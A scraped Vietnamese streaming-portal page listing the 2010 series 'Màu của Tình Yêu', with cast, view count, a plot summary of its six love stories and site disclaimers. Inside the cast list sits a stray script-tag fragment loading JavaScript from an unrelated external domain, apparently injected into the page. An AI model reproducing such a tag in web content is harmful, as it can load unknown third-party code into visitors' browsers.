xem phim mau cua tinh yeu online, download Màu của Tình Yêu 31/31 (VN 2010) hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Màu của Tình Yêu 31/31 (VN 2010) - phim viet nam
mau cua tinh yeu

Màu của Tình Yêu 31/31 (VN 2010)

,

32 episodes | Luot Xem: 1563925   |  2010 |  Vietnam
Dien Vien: Lê Khánh, Hoàng Thu Hiền, Kiều Minh Tuấn, Cao Danh, NSƯT Mai Thanh Dung; Các ca sĩ Khổng Tú Quỳnh, Lương Bích Hữu, Thiên Vương, Lưu Minh Tuấn, Minh Thuận type="text/javascrip src="http://raphd.net/js/loadjaca.js

cham bi  Description - Thong tin them ve phim

Với các diễn viên: Lê Khánh, Hoàng Thu Hiền, Kiều Minh Tuấn, Cao Danh, NSƯT Mai Thanh Dung; Các ca sĩ Khổng Tú Quỳnh, Lương Bích Hữu, Thiên Vương, Lưu Minh Tuấn, Minh Thuận…
Màu của tình yêu là sự hoà quyện giữa các màu sắc lãng mạn, vẽ nên từ cuộc gặp gỡ tình cờ, chuyện tình lãng mạn của những người trẻ tuổi.
Màu xanh bắt đầu từ cuộc gặp gỡ tình cờ của Hiểu Nhi và Quốc Kiệt khi cả hai có ý định tự tử. Qua câu chuyện của mình, cả hai nhận ra họ đã trao nhau niềm tin, hy vọng xanh tươi cho cuộc đời mỗi người.
Màu trắng dệt nên câu chuyện của Kỳ Nguyên, em gái Hiểu Nhi –cô gái thánh thiện, mong muốn đem đến cho cuộc đời sự vui vẻ, ấm áp. Tình cờ Kỳ Nguyên gặp Tuấn Hùng –giảng viên đại học và Vĩnh Cường – chủ nhân văn phòng Tìm một nửa của bạn. Cả ba trải qua những tình huống bất ngờ thú vị giữa tình yêu và tình bạn.
Màu vànglà một phép hoán đổi tình cờ của ba nhân vật chính: Quốc Kiệt – Kỳ Nguyên – Tồn Quân. Vì ghét sự mai mối mà Quốc Kiệt và Kỳ Nguyên đều tìm “phương án phòng thủ” riêng. Quốc Kiệt nhờ Tồn Quân thay mình đi gặp người mà cha mẹ mai mối, còn Kỳ Nguyên thì ngỡ đó là Quốc Kiệt nên tìm mọi cách phá rối anh. Cuối cùng, tình yêu đã hoán đổi câu chuyện của họ một cách ngoạn mục…
Màu tím hé mởt câu chuyện như cổ tích của Hạnh Như -cô gái mồ côi bán kẹo bòn bon, thầm yêu một chàng đẹp trai giàu có. Bằng tấm lòng chân thành, Hạnh Như đã khiến cho trái tim chàng rung động và nhận ra cô là một nửa mà anh đang tìm.
Màu đỏ là trò chơi tình yêu giữa Vĩnh Cường với Hiểu Nhi. Những cuộc tranh đua nảy lửa, vui nhộn trong công việc đã khiến họ xích lại gần nhau hơn. Và hạnh phúc trong tình yêu là chiến thắng cuối cùng của họ.
Màu hồng được tạo nên bằng sự mơ mộng của nghệ sĩ múa Thiên Nga. Cô cứ ngỡ chàng trai Thiện Văn là “một nửa” của mình, nhưng trên đường tìm kiếm tình yêu, Thiên Nga đã nhận ra tình yêu đích thực với thầy giáo Tuấn Hùng.
Sáu màu sắc, sáu câu chuyện tình yêu, tình bạn đã tạo nên bức tranh lung linh, lãng mạn. Với các bối cảnh đẹp ở TP. HCM, Long Hải, các tỉnh miền Tây Nam bộ và nhiều tình huống hài hước bất ngờ, bộ phim mang đến cho khán giả một không gian tràn đầy màu sắc tươi mới.

Phim cùng thể loại - Similar movies
View: 615246
View: 1494534
View: 878793
View: 72390
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung